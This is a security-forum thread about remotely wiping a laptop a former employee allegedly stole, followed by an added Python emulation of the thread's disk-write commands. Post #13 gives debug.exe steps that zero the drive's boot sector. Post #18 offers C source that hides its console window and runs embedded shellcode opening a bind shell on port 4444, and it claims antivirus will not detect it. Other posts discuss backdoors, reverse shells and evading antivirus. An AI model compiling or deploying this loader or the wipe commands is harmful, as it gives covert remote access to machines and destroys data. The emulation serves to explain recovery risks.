
Thread: Sanitising a computer remotely

  1. #11
    ShadowKill (Senior Member)
    Join Date: Dec 2007 | Posts: 908

    Quote Originally Posted by KamiCrazy
    Hi purehate,

    I do have more control than the actual user; for instance, he still uses the login he used at my client's site, which only has normal user rights, not full admin rights.
    I do not know why the person did not reinstall the laptop; however, my client believes that the employee stole the laptop not for the laptop itself (because it's a piece of crap machine from circa 2003), but for the data on it.
    My client is an accounting firm; that laptop contained copies of all their customers' financial information. You can understand that my client is very unhappy that such a breach of their customers' privacy is happening at the moment.

    This is why my job is to sanitise the machine. The thief's biggest mistake is that he is using the laptop normally.
    Well then it seems like you have answered your own question. Since you have "full" control over said box, just plant a shredder to wipe the drive on boot or take the time to do it manually. Unless he has any sort of forensics experience, a simple deep-format should do the trick.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  2. #12
    merlin051 (Member)
    Join Date: Mar 2007 | Posts: 204

    What if?

    What if he's made copies of all the financial data you claim is on there?

    What if you wipe all his stuff, then he just recovers the deleted data?

    I'm guessing this guy isn't actually from the IT department, right?

    Then again, he could be; it took 1 hour and 3 DVD-RW drives for the IT guy at my place to copy a DVD with some video reports on it, and even then he still couldn't manage it, so I had to take it home and do it myself!

  3. #13
    killadaninja (Very good friend of the forum)
    Join Date: Oct 2007 | Location: London, United Kingdom | Posts: 526

    Quote Originally Posted by ShadowKill
    Well then it seems like you have answered your own question. Since you have "full" control over said box, just plant a shredder to wipe the drive on boot or take the time to do it manually. Unless he has any sort of forensics experience, a simple deep-format should do the trick.
    That's what I don't understand, Shadow. He seems like an intelligent guy; that's why I don't understand why he's asking how to delete data from a machine he has full write privileges over.

    Anyhow, let's get this moving.

    OK OPEN UP A COMMAND PROMPT

    now type

    "debug" press enter
    "a 100" press enter
    "int13" press enter

    press enter without typing anything

    "rax" press enter
    "0301" press enter
    "rbx" press enter
    "0200" press enter
    "f 200 l 200 0" (note, this is a lower case "L") press enter
    "rcx" press enter
    "0001" press enter
    "rdx" press enter
    "0080" press enter
    "p" press enter
    "q" press enter


    NOW REBOOT THE MACHINE. YOU SHOULDN'T SEE THIS MACHINE ONLINE ANY MORE; THE WHOLE HARD DRIVE IS PERMANENTLY FORMATTED. ATTEMPT THIS; IF IT DOES NOT WORK THEN TELL US.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  4. #14
    killadaninja (Very good friend of the forum)
    Join Date: Oct 2007 | Location: London, United Kingdom | Posts: 526

    P.S. purehate, I hope you don't mind me helping him, but
    1. He seems very genuine to me and what he is saying is EASILY BELIEVABLE.
    2. If he is unethical and he's managed to compromise a computer's security this far, he CERTAINLY doesn't need us to help him learn how to trash it.
    3. If he was a blackhatter and he somehow got this far without knowing what he was doing, he would be asking how do I crack shared file passwords, NetBIOS etc.

    So taking all this into account I found it just to help him.

  5. #15
    imported_Deathray (Member)
    Join Date: Oct 2007 | Posts: 381

    If I were you I would first somehow shred the specific data you can find that is related to the company.
    After that, try killadaninja's proposition. Recovering data from a simple format is way too easy.

    Just make sure you accomplish whatever you need to do quickly.
    Chances are if he notices anything fishy, it'll probably be the last time you'll be able to connect.
    Either that or he hurries up and makes a backup of all the data.

    Good luck!
    - Poul Wittig
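
    Posts #13 and #15 between them raise the question this thread is really about: whether a given write destroys the data or only makes it look gone. The Python below is an added example, not code from the thread or from any poster. It builds a tiny in-memory disk image, places one constructed "customer record" in a data sector, then feeds the exact register values typed in the debug script (rax=0301, rbx=0200 with a zero-filled buffer, rcx=0001, rdx=0080) to an emulation of INT 13h AH=03h as a BIOS decodes those registers, and diffs the image. The geometry, the record and the sector number it lives in are constructed. The result is that the script writes exactly one zeroed sector, CHS (0,0,1), the MBR: the partition table is gone, but every data sector is untouched and the record is still there for a carving tool to find, which is the "simple format is way too easy to recover" point. Only overwriting every sector removes it.

```python
"""Simulated INT 13h write against a toy disk image (constructed example).

Nothing here touches a real disk; the image is a bytearray.
"""
import os

SECTOR = 512
# Constructed geometry (cylinders, heads, sectors per track). Real drives are
# far larger, but the CHS arithmetic a BIOS performs is the same.
CYLINDERS, HEADS, SPT = 4, 2, 8
DISK_BYTES = CYLINDERS * HEADS * SPT * SECTOR

# Constructed sample record, standing in for the accounting data.
CUSTOMER_RECORD = b"ACME Ltd; account 12-3456; balance 98765.43"
DATA_SECTOR = 21  # arbitrary constructed sector well past the MBR


def chs_to_lba(cyl: int, head: int, sector: int) -> int:
    """Classic CHS -> LBA mapping; BIOS sector numbers start at 1."""
    return (cyl * HEADS + head) * SPT + (sector - 1)


def int13_write(image: bytearray, ax: int, es_bx: bytes, cx: int, dx: int) -> list[int]:
    """Emulate INT 13h AH=03h (write sectors) with the BIOS register encoding:
    AH=function, AL=sector count, CH=cylinder low byte, CL=sector (bits 0-5)
    plus cylinder bits 8-9 (bits 6-7), DH=head, DL=drive (0x80 = first fixed
    disk). Returns the LBA numbers that were written."""
    ah, al = ax >> 8, ax & 0xFF
    if ah != 0x03:
        raise ValueError("only AH=03h (write) is emulated here")
    ch, cl = cx >> 8, cx & 0xFF
    dh, dl = dx >> 8, dx & 0xFF
    if dl != 0x80:
        raise ValueError("only the first fixed disk is emulated")
    cyl = ch | ((cl & 0xC0) << 2)
    sector = cl & 0x3F
    first = chs_to_lba(cyl, dh, sector)
    written = []
    for i in range(al):
        lba = first + i
        image[lba * SECTOR:(lba + 1) * SECTOR] = es_bx[i * SECTOR:(i + 1) * SECTOR]
        written.append(lba)
    return written


def fresh_disk() -> bytearray:
    """Image with a fake MBR (boot signature 55 AA) and the record in a data sector."""
    image = bytearray(DISK_BYTES)
    image[0:2] = b"\x33\xc0"          # placeholder boot code
    image[510:512] = b"\x55\xaa"      # MBR signature
    off = DATA_SECTOR * SECTOR
    image[off:off + len(CUSTOMER_RECORD)] = CUSTOMER_RECORD
    return image


def run_debug_script(image: bytearray) -> list[int]:
    """The register values typed in post #13: rax=0301 (write, 1 sector),
    rbx=0200 (buffer), "f 200 l 200 0" (zero-fill the 0x200-byte buffer),
    rcx=0001 (cylinder 0, sector 1), rdx=0080 (head 0, first fixed disk)."""
    buffer = bytes(0x200)
    return int13_write(image, ax=0x0301, es_bx=buffer, cx=0x0001, dx=0x0080)


def changed_sectors(before: bytes, after: bytes) -> list[int]:
    """Sector numbers whose contents differ between two images."""
    return [n for n in range(DISK_BYTES // SECTOR)
            if before[n * SECTOR:(n + 1) * SECTOR] != after[n * SECTOR:(n + 1) * SECTOR]]


def record_recoverable(image: bytes) -> bool:
    """What a carving tool does: look for the bytes anywhere on the media."""
    return CUSTOMER_RECORD in image


def overwrite_every_sector(image: bytearray, passes: int = 1) -> None:
    """Sanitisation that actually removes the data: overwrite the whole image."""
    for _ in range(passes):
        image[:] = os.urandom(DISK_BYTES)


def demo() -> dict:
    image = fresh_disk()
    before = bytes(image)
    touched = run_debug_script(image)
    result = {
        "sectors_written_by_script": touched,
        "sectors_changed_by_script": changed_sectors(before, bytes(image)),
        "mbr_signature_gone": image[510:512] != b"\x55\xaa",
        "record_after_script": record_recoverable(image),
    }
    overwrite_every_sector(image)
    result["record_after_overwrite"] = record_recoverable(image)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    Run it as a script to print the result dictionary: the script's write lands on sector 0 only, the MBR signature is gone, the record is still present, and it disappears only after the full overwrite. One further caveat a practitioner would want: on NT-based Windows, debug.exe runs under NTVDM, which does not pass INT 13h writes to a fixed disk through to the hardware, so on the laptop described in this thread the sequence would not even reach the MBR.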

  6. #16
    purehate (Developer)
    Join Date: Mar 2007 | Posts: 6,126

    I left the thread open, so that means if you want to give the OP suggestions it's OK by me. I was merely stating some issues that I had personally with the post. There were no forum rules broken and, like I said, the OP makes a valid case. I just have a habit of trusting hardly anyone on the internet. The circle of people I trust on this forum is fairly small. Just my nature, I guess.

  7. #17
    KamiCrazy (Just burned his ISO)
    Join Date: Sep 2008 | Posts: 15

    Sorry, I've been very busy this morning and have not had a chance to reply to much apart from purehate's post, in which I wanted to clear up why the notebook has not been reformatted.

    @streaker69:

    The user is able to know when we remote control the computer. I use that to differentiate from connecting to it.
    When we use RDP, of course, the user's console locks out and tells him that administrator is logged on. If we use VNC, the VNC session causes the laptop's desktop background to change and an icon on the taskbar to change.
    Basically the management software is designed to notify the user of remote interactive access. If we alert him to this he will likely disconnect the laptop from the network and we will lose our chance.

    My colleague and I have been approached personally by a company director to make this happen. He's told us personally to do this, so yes we have our asses covered in this regard.

    @Virchanza:

    Yes the agent connects back to us, traversing any NAT in place.

    @cybrsnpr:

    A batch file was something I had in mind already, thanks for the suggestion I will look into implementing this.

    @merlin051:

    If the thief has made copies then there is nothing we can do. However, I don't think he has; he doesn't understand the database files which the financial data is kept in. He simply knows how to open an accounting app and access the info. Plus, if he had made copies he would have likely wiped the laptop and reinstalled/sold it off.

    @killadaninja:

    We do not have command prompt access without installing another backdoor or exploiting a reverse shell remote vulnerability.
    But I can probably take those commands and insert them into a batch file, upload it and run it non-interactively.
    Running scripts and stuff has certain quirks due to how Kaseya executes things. It uses the local user account who is logged in at the moment. You can set things to be run as SYSTEM, but I've found that some things which you expect to be run don't.
    Then there's the anti-virus. I can't disable it currently without taking interactive control.

    @all:

    I had originally considered uploading a script to delete the important data. However, doing a format like killadaninja's is much better.

    I also considered uploading a local side exploit to open a backdoor so I can get a reverse shell (upload via FTP through Kaseya, run backdoor through Kaseya as local user). However, I'm pretty sure that if I upload anything the AV will catch it and kill it.

    At this stage I think the remote script is best. To be honest I had some answers already but I wanted suggestions if someone could come with anything better and yes from the answers in this thread there have been better ways.

  8. #18
    compaq (Good friend of the forums)
    Join Date: Jun 2008 | Posts: 425

    Quote Originally Posted by KamiCrazy
    I also considered uploading a local side exploit to open a backdoor so I can get a reverse shell (upload via FTP through Kaseya, run backdoor through Kaseya as local user). However, I'm pretty sure that if I upload anything the AV will catch it and kill it.
    Compile this; it opens port 4444, but just go to the Metasploit web site and find a shellcode you like.
    This won't be DETECTED by any AV.

    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock2.h>
    #define _WIN32_WINNT 0x0500
    #include <windows.h>
    #include <iostream>
    
    unsigned char bindcode[] =
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8"
    "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc"
    "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde"
    "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f"
    "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac"
    "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc"
    "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17"
    "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97"
    "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45"
    "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14"
    "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6"
    "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f"
    "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e"
    "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10"
    "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17"
    "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a"
    "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8"
    "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16"
    "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97"
    "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18"
    "\x9d\xda\xae\xb8\x1e\x25\x78\x47";
    
    
    
    int main()
    {
    HWND hWnd = GetConsoleWindow();
    ShowWindow( hWnd, SW_HIDE );
    
     WSADATA wsadata;
     WSAStartup(WINSOCK_VERSION,&wsadata);
     ((void (*)(void)) &bindcode)();
    }

  9. #19
    purehate (Developer)
    Join Date: Mar 2007 | Posts: 6,126

    So I'm not a C expert by any means and I was just wondering, compaq, why that snippet of code won't compile with GCC? Is there some C that can only be compiled in Visual Studio or something?

    OK, so I figured out I don't have the Win32 libs on my system for some reason. If anyone knows the Gentoo packages to install those, please PM me with the answer.

  10. #20
    Virchanza (Very good friend of the forum)
    Join Date: Jan 2010 | Posts: 863

    What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens port 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?

    Another problem is that the victim machine will always be behind a NAT router, and also the firewall on the computer itself will probably block the traffic.

    @pureh@te:
    I dunno if you're being sarcastic, but here's an explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler extensions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
